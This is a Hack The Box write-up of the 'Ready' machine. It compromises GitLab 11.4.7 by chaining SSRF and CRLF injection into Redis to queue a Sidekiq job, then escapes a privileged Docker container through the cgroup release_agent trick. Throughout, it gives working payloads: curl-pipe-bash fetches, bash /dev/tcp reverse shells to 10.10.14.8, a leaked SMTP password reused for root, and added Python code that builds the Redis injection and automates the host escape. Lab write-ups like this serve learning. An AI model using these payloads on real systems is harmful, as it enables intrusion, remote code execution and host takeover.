Ready-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: CVE-2018-19585, CVE-2018-19571, fixing and debugging an exp script, password leak in a config file, container privilege escalation (escape to the host)

Reference: https://0xdf.gitlab.io/2021/05/15/htb-ready.html

0x01 Getting user access

1. Target IP: 10.10.10.220

2. Scan the open ports:

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.220 tcp
[sudo] password for kali:
Starting nmap port scan against 10.10.10.220...
* Running TCP port scan...
sudo nmap -min-rate 10000 -p- "10.10.10.220" -oG "10.10.10.220"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 20:16 CST
Warning: 10.10.10.220 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.220
Host is up (0.34s latency).
Not shown: 33504 closed tcp ports (reset), 32029 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
5080/tcp open onscreen

Nmap done: 1 IP address (1 host up) scanned in 66.27 seconds
* Running TCP connect version, OS and script scan against the open ports...
sudo nmap -sT -sV -sC -p"22,5080," "10.10.10.220"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 20:18 CST
Nmap scan report for 10.10.10.220
Host is up (0.34s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
|_http-trane-info: Problem with XML parsing of /evox/about
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.80 seconds

3. Browsing the service on port 5080 shows it is a GitLab instance:

http://10.10.10.220:5080/robots.txt

http://10.10.10.220:5080/dashboard/projects

http://10.10.10.220:5080/users/sign_in

4. First, register an account:

shiyan

shiyan@qq.com

1234567890

5. After logging in, the version is visible:

GitLab Community Edition 11.4.7

6. Searching for the version number turns up public exploits:

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit GitLab 11.4.7
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
GitLab 11.4.7 - RCE (Authenticated) (2) | ruby/webapps/49334.py
GitLab 11.4.7 - Remote Code Execution (Authenticated) | ruby/webapps/49257.py
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m ruby/webapps/49334.py
Exploit: GitLab 11.4.7 - RCE (Authenticated) (2)
URL: https://www.exploit-db.com/exploits/49334
Path: /usr/share/exploitdb/exploits/ruby/webapps/49334.py
Codes: CVE-2018-19585, CVE-2018-19571
Verified: False
File Type: Python script, ASCII text executable, with very long lines (359)
Copied to: /home/kali/桌面/49334.py

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49334.py
usage: 49334.py [-h] -u U -p P -g G -l L -P P
49334.py: error: the following arguments are required: -u, -p, -g, -l, -P

┌──(kali㉿kali)-[~/桌面]
└─$ python3 49334.py -u shiyan -p 1234567890 -g http://10.10.10.220 -l 10.10.14.8 -P 443
[+] authenticity_token: wTPcvdOYa5Ga0zcJ55JCeAEjYEBrCf0I225Pc2PP1afTJsy1rDygqr0hzu0ZTQQzxLoKrIV5/HEZbh2u3iyIhA==
[+] Creating project with random name: project240
[+] Running Exploit
[+] Exploit completed successfully!

7. But no reverse shell ever came back on 443....

8. The script is clearly a chain of those two CVEs, so the only option left is to do each step by hand and get the reverse shell manually.

CVE-2018-19571 SSRF

In an SSRF the attacker tricks the server into making requests on their behalf. Here the vulnerable spot is New project -> Import project:

Selecting "Repo by URL" gives a URL field, and the server makes a GET request to whatever is entered there. I start nc on port 80 and give http://10.10.14.8 as the URL. The site shows the import in progress and just hangs; on my VM a request comes in:

Git repository url

http://10.10.14.8

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 34996
GET /info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.8
User-Agent: git/2.18.1
Accept: */*
Accept-Encoding: deflate, gzip
Pragma: no-cache

9. So the SSRF is confirmed: GitLab's git client will connect wherever the import URL points, including services on localhost. On to the next bug.

CVE-2018-19585 - CRLF injection

POST /projects HTTP/1.1
Host: 10.10.10.220:5080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.220:5080/projects/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 363
Origin: http://10.10.10.220:5080
Connection: close
Cookie: _gitlab_session=19ede108b18daaf98eb2bd6a7ca4e9cc; event_filter=all
Upgrade-Insecure-Requests: 1

utf8=%E2%9C%93&authenticity_token=EUpiOE0fNqkr%2FqYMU7Z3UMyOwG8uxdhGl7%2BVYAFwug%2FafEyAAyRAeXyCCgvlnK%2FHUYfzC6yQi7Ew1hpm7Mq2Zw%3D%3D&project%5Bimport_url%5D=git%3A%2F%2F10.10.14.8%3A80%2Ftest
test1
test2
test3
%2F.git&project%5Bci_cd_only%5D=false&project%5Bname%5D=test3&project%5Bnamespace_id%5D=6&project%5Bpath%5D=test&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0
┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 35610
0049git-upload-pack /test
test1
test2
test3
/.githost=10.10.14.8:80

10. The line breaks arrive intact: git copies the path into its git-upload-pack request verbatim, each injected line lands on the socket as its own line, and only the NUL bytes are invisible (nc does not print them, so the "host=10.10.14.8:80" that git appends after /.git runs into it as /.githost=10.10.14.8:80). This bug checks out too, so time to chain them.

Reference: https://hackerone.com/reports/299473

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh
#!/bin/bash

bash >& /dev/tcp/10.10.14.8/443 0>&1

The import URL targets Redis on 6379 (GitLab keeps its Sidekiq queues there), written as [0:0:0:0:0:ffff:127.0.0.1], the IPv4-mapped IPv6 spelling of loopback, which is what slips past GitLab's localhost blocklist. The injected lines push a Sidekiq job onto the system_hook_push queue; GitlabShellWorker then class_evals the Ruby in the job, which fetches and runs shell.sh. Create and import:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/.git

POST /projects HTTP/1.1
Host: 10.10.10.220:5080
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.10.220:5080/projects/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://10.10.10.220:5080
Connection: close
Cookie: _gitlab_session=19ede108b18daaf98eb2bd6a7ca4e9cc; event_filter=all
Upgrade-Insecure-Requests: 1

utf8=%E2%9C%93&authenticity_token=VnJtV23ET0R57h8AGNw0nzeoY3mpjUYBsKFQ877zsDidREPvI%2F85lC6Ssweu9uwIqqFQHSvYFfYXyN%2F1U0m8UA%3D%3D&project%5Bimport_url%5D=git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.8/shell.sh|bash\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
%2F.git&project%5Bci_cd_only%5D=false&project%5Bname%5D=test8&project%5Bnamespace_id%5D=6&project%5Bpath%5D=test8&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [16/Jan/2024 11:00:44] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.220 - - [16/Jan/2024 11:01:03] "GET /shell.sh HTTP/1.1" 200 -
10.10.10.220 - - [16/Jan/2024 11:01:36] "GET /shell.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 48898
id
uid=998(git) gid=998(git) groups=998(git)
python3 -c 'import pty;pty.spawn("/bin/bash")'
git@gitlab:~/gitlab-rails/working$

git@gitlab:~/gitlab-rails/working$ id
id
uid=998(git) gid=998(git) groups=998(git)
git@gitlab:~/gitlab-rails/working$

11. Grab the first flag:

git@gitlab:~/gitlab-rails/working$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 1 root root 4096 Apr 5 2022 .
drwxr-xr-x 1 root root 4096 Apr 5 2022 ..
drwxr-xr-x 2 root root 4096 Apr 5 2022 dude
git@gitlab:~/gitlab-rails/working$ ls -la /home/dude
ls -la /home/dude
total 12
drwxr-xr-x 2 root root 4096 Apr 5 2022 .
drwxr-xr-x 1 root root 4096 Apr 5 2022 ..
-r-xr-x--x 2 git git 33 Jan 16 01:51 user.txt
git@gitlab:~/gitlab-rails/working$ cat /home/dude/user.txt
cat /home/dude/user.txt
9db1020b9d3cc27229c646622b524844
git@gitlab:~/gitlab-rails/working$

12. Working backwards to why the exp never called back: presumably the nc-style reverse shell the script pushes does not work on this box. After changing the job's command to fetch and run shell.sh instead, the shell came back.

# 49334.py after the change: local_ip and local_port are the script's -l and -P arguments;
# the job now fetches shell.sh (served with python3 -m http.server) instead of the script's own callback
form = """\nmulti
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'curl http://{local_ip}:{local_port}/shell.sh | bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
exec
exec
exec\n"""
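The chain from steps 8 through 10, and the exp fix in step 12, as an added example that is not the author's code and not 49334.py: it builds the same import_url, produces the exact bytes git puts on the wire for it, and splits those bytes the way Redis's inline protocol does, so every piece can be checked offline without a GitLab. The 10.10.14.8:80 listener, the Redis address, the queue names, the jid and the timestamps are taken from the writeup's own payload; the function names (wire_for_url, redis_payload and the rest) are mine.

```python
"""Added example for the GitLab 11.4.7 SSRF + CRLF + Redis chain; not the
writeup's code and not 49334.py. All functions are side-effect free."""
import json
from typing import List, Tuple

# IPv4-mapped IPv6 loopback: not on GitLab's 127.0.0.1/localhost blocklist.
LOOPBACK_BYPASS = "[0:0:0:0:0:ffff:127.0.0.1]"


def git_pktline(payload: bytes) -> bytes:
    """Git wire framing: 4 hex digits = len(payload) + 4, then the payload."""
    return b"%04x" % (len(payload) + 4) + payload


def git_upload_pack_request(path: str, hostandport: str) -> bytes:
    """First packet `git clone git://<hostandport><path>` sends (protocol v0):
    'git-upload-pack <path>\\0host=<hostandport>\\0'. The path is copied in
    verbatim, so CR/LF inside it reach the server unchanged."""
    return git_pktline(f"git-upload-pack {path}\0host={hostandport}\0".encode())


def wire_for_url(url: str) -> bytes:
    """Bytes git will send for a git:// URL. Split by hand on purpose:
    urllib.parse.urlsplit strips CR and LF out of URLs."""
    hostandport, _, path = url[len("git://"):].partition("/")
    return git_upload_pack_request("/" + path, hostandport)


def redis_inline_commands(stream: bytes) -> List[Tuple[str, str]]:
    """How Redis's inline protocol sees that stream: one command per '\\n'
    (a trailing '\\r' is dropped), first whitespace-separated token is the
    command name. An unknown command only earns an -ERR reply and the socket
    stays open, so git's own framing just costs two failed commands. Redis
    does close the connection on a line starting with POST or Host:, which
    is why an http:// import URL could not have been used for this."""
    out = []
    for raw in stream.split(b"\n"):
        line = raw.decode("latin-1").rstrip("\r")
        if line.strip():
            out.append((line.split()[0], line))
    return out


def sidekiq_job(ruby_expr: str) -> str:
    """Sidekiq job JSON for GitlabShellWorker, which class_evals its
    argument. json.dumps does the escaping the exploit script hand-rolls."""
    return json.dumps({
        "class": "GitlabShellWorker",
        "args": ["class_eval", ruby_expr],
        "retry": 3,
        "queue": "system_hook_push",
        "jid": "ad52abc5641173e217eb2e52",
        "created_at": 1513714403.8122594,
        "enqueued_at": 1513714403.8129568,
    })


def redis_quote(s: str) -> str:
    """Double-quoted inline argument: Redis only needs backslash and quote escaped."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def redis_payload(host_cmd: str) -> List[str]:
    """Queue one job inside MULTI/EXEC: register the queue, push the job."""
    job = sidekiq_job(f"open('|{host_cmd}').read")
    return [
        "multi",
        "sadd resque:gitlab:queues system_hook_push",
        f"lpush resque:gitlab:queue:system_hook_push {redis_quote(job)}",
        "exec",
    ]


def import_url(redis_cmds: List[str], repo: str = "test") -> str:
    """The project[import_url] value: every injected command becomes its own
    line of the repository path. CRLF is what the captured 0049 packet
    implies Burp sent."""
    return (f"git://{LOOPBACK_BYPASS}:6379/{repo}\r\n"
            + "\r\n".join(redis_cmds) + "\r\n/.git")


if __name__ == "__main__":
    url = import_url(redis_payload("curl http://10.10.14.8/shell.sh|bash"))
    for name, line in redis_inline_commands(wire_for_url(url)):
        print(name, "<-", line[:60])
```

wire_for_url("git://10.10.14.8:80/test\r\ntest1\r\ntest2\r\ntest3\r\n/.git") comes out 73 bytes long, the 0049 prefix nc printed in step 9's capture; that only adds up if the line breaks Burp sent were CRLF (with bare LF the prefix would be 0045). Fed through redis_inline_commands, the Redis version of the URL yields an unknown command before and after (git's framing) and the four real commands in between, which is all it takes to get the job queued; git itself then fails on Redis's -ERR replies, but the import failing is irrelevant once Sidekiq picks the job up.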

0x02 Getting root

13. Looking around the container turns up /opt/backup. gitlab-secrets.json holds GitLab's own secrets and keys, but nothing useful to me. docker-compose.yml is interesting and will matter later. gitlab.rb is the config file and nearly every line is a # comment, so grep those out and keep the non-blank lines. Only one is left:

git@gitlab:~/gitlab-rails/working$ ls -la                                                
ls -la
total 8
drwx------ 2 git root 4096 Apr 5 2022 .
drwxr-xr-x 9 git root 4096 Jan 16 01:51 ..
git@gitlab:~/gitlab-rails/working$ ipconfig
ipconfig
bash: ipconfig: command not found
git@gitlab:~/gitlab-rails/working$ cd /opt
cd /opt
git@gitlab:/opt$ ls -la
ls -la
total 24
drwxr-xr-x 1 root root 4096 Apr 5 2022 .
drwxr-xr-x 1 root root 4096 Apr 5 2022 ..
drwxr-xr-x 2 root root 4096 Apr 5 2022 backup
drwxr-xr-x 1 root root 4096 Apr 5 2022 gitlab
git@gitlab:/opt$ cd backup
cd backup
git@gitlab:/opt/backup$ ls -la
ls -la
total 112
drwxr-xr-x 2 root root 4096 Apr 5 2022 .
drwxr-xr-x 1 root root 4096 Apr 5 2022 ..
-rw-r--r-- 1 root root 904 Apr 5 2022 docker-compose.yml
-rw-r--r-- 1 root root 15150 Apr 5 2022 gitlab-secrets.json
-rw-r--r-- 1 root root 81492 Apr 5 2022 gitlab.rb
git@gitlab:/opt/backup$ cat gitlab.rb | grep -v "^#" | grep .
cat gitlab.rb | grep -v "^#" | grep .

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

git@gitlab:/opt/backup$

14. That is a password from inside the container (the SMTP one); try it for root with su:

git@gitlab:/opt/backup$ su -  
su -
Password: wW59U!ZKMbG9+*#h

root@gitlab:~#

root@gitlab:~#

15. What comes next was outside my knowledge, so I mainly followed this article. The technique only works in a privileged container (root plus CAP_SYS_ADMIN and a cgroup v1 hierarchy mounted read-write), which is the kind of thing the docker-compose.yml found above is worth checking for:

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

# first cgroup v1 subsystem directory that exposes a release_agent file
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# child cgroup "w"; notify_on_release=1 makes the kernel run release_agent once it is empty
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
# host-side path of this container's overlay upper layer, i.e. where /c lands on the host
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# register $t/c as the agent and write the script it runs (on the host, as root)
echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;
# a throwaway sh joins the child cgroup and exits; the cgroup empties and the agent fires
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";

16. Run it, catch the callback and read the final flag:

┌──(kali㉿kali)-[~/桌面]
└─$ cat poc.sh
#!/bin/bash

bash >& /dev/tcp/10.10.14.8/10086 0>&1

root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;
<d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/poc.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
root@gitlab:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:~#

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.220] 54088
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
cd /root/
ls -la
total 68
drwx------ 10 root root 4096 Jan 16 01:51 .
drwxr-xr-x 20 root root 4096 Apr 5 2022 ..
lrwxrwxrwx 1 root root 9 Jul 11 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Apr 5 2022 .cache
drwx------ 3 root root 4096 Apr 5 2022 .config
-rw-r--r-- 1 root root 44 Jul 8 2020 .gitconfig
-rw------- 1 root root 32 Apr 5 2022 .lesshst
drwxr-xr-x 3 root root 4096 Apr 5 2022 .local
lrwxrwxrwx 1 root root 9 Dec 7 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 75 Jul 12 2020 .selected_editor
drwx------ 2 root root 4096 Apr 5 2022 .ssh
drwxr-xr-x 2 root root 4096 Apr 5 2022 .vim
-rw-rw-rw- 1 root root 1432 Apr 5 2022 .viminfo
drwxr-xr-x 3 root root 4096 Apr 5 2022 docker-gitlab
drwxr-xr-x 10 root root 4096 Apr 5 2022 ready-channel
-r-------- 1 root root 33 Jan 16 01:51 root.txt
drwxr-xr-x 3 root root 4096 Apr 5 2022 snap
cat root.txt
b1bc77140df76ab7840a4e68b25a0edd
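The escape from steps 15 and 16, as an added example that is neither the author's one-liner nor the Trail of Bits code: the same release_agent trick with its preconditions checked up front (root, CAP_SYS_ADMIN, a writable cgroup v1 hierarchy, an overlay root) so a failed attempt says why. The callback command and 10.10.14.8 are the writeup's; the function names and the CapEff and mtab samples mentioned in the comments are mine.

```python
"""Added example: cgroup v1 release_agent container escape with explicit
precondition checks. Not the writeup's code and not Trail of Bits' PoC."""
import glob
import os
import re
from typing import List, Optional

CAP_SYS_ADMIN = 21  # bit index in the CapEff mask from /proc/self/status


def has_cap_sys_admin(cap_eff_hex: str) -> bool:
    """CapEff as printed in /proc/self/status. A --privileged container shows
    e.g. 0000003fffffffff; Docker's default set 00000000a80425fb lacks bit 21
    (sample values, not taken from the box)."""
    return (int(cap_eff_hex, 16) >> CAP_SYS_ADMIN) & 1 == 1


def upperdir_from_mtab(mtab: str) -> Optional[str]:
    """The container's / is an overlay mount; its upperdir= option is the host
    directory holding the container's writable layer, so a file /c written
    inside the container is <upperdir>/c on the host."""
    m = re.search(r"upperdir=([^,\s]+)", mtab)
    return m.group(1) if m else None


def current_cap_eff() -> str:
    with open("/proc/self/status") as f:
        for line in f:
            if line.startswith("CapEff:"):
                return line.split()[1]
    return "0"


def writable_release_agent() -> Optional[str]:
    """First cgroup v1 subsystem whose release_agent we can write; needs the
    hierarchy mounted rw, which is what a privileged container gets."""
    for path in sorted(glob.glob("/sys/fs/cgroup/*/release_agent")):
        if os.access(path, os.W_OK):
            return path
    return None


def escape_problems() -> List[str]:
    """Empty list means the escape should work; otherwise, why it will not."""
    problems = []
    if os.geteuid() != 0:
        problems.append("not root inside the container")
    if not has_cap_sys_admin(current_cap_eff()):
        problems.append("no CAP_SYS_ADMIN (container is not privileged)")
    if writable_release_agent() is None:
        problems.append("no writable cgroup v1 release_agent")
    try:
        with open("/etc/mtab") as f:
            if upperdir_from_mtab(f.read()) is None:
                problems.append("/ is not an overlay mount; cannot map a container path to the host")
    except OSError:
        problems.append("cannot read /etc/mtab")
    return problems


def release_agent_escape(host_cmd: str, script_path: str = "/c") -> str:
    """Point a cgroup's release_agent at a script we wrote, then empty a child
    cgroup so the kernel runs that script as root on the host. Returns the
    host-side path that was registered."""
    problems = escape_problems()
    if problems:
        raise RuntimeError("; ".join(problems))
    agent = writable_release_agent()
    child = os.path.join(os.path.dirname(agent), "w")
    with open("/etc/mtab") as f:
        host_path = upperdir_from_mtab(f.read()) + script_path
    os.makedirs(child, exist_ok=True)
    with open(os.path.join(child, "notify_on_release"), "w") as f:
        f.write("1\n")
    with open(script_path, "w") as f:
        f.write("#!/bin/sh\n" + host_cmd + "\n")
    os.chmod(script_path, 0o755)
    with open(agent, "w") as f:
        f.write(host_path + "\n")
    # A child joins the cgroup ("0" means the writing process itself) and
    # exits at once; the cgroup becoming empty is what fires the agent.
    pid = os.fork()
    if pid == 0:
        with open(os.path.join(child, "cgroup.procs"), "w") as f:
            f.write("0\n")
        os._exit(0)
    os.waitpid(pid, 0)
    return host_path


if __name__ == "__main__":
    # Same callback as the writeup: poc.sh served from 10.10.14.8 opens the shell.
    print(release_agent_escape("curl 10.10.14.8/poc.sh | bash"))
```

Only the __main__ block touches the system; the two parsers take their input as arguments. On a default, non-privileged Docker container escape_problems() reports the missing CAP_SYS_ADMIN and the unwritable release_agent, which is the quickest way to tell whether this route is even worth trying before writing anything under /sys/fs/cgroup.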

17. The container part is still a bit hard for me = =!

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/304


Ready-htb-writeup
https://sh1yan.top/2024/01/14/Ready-htb-writeup/
Author: shiyan
Published: 14 January 2024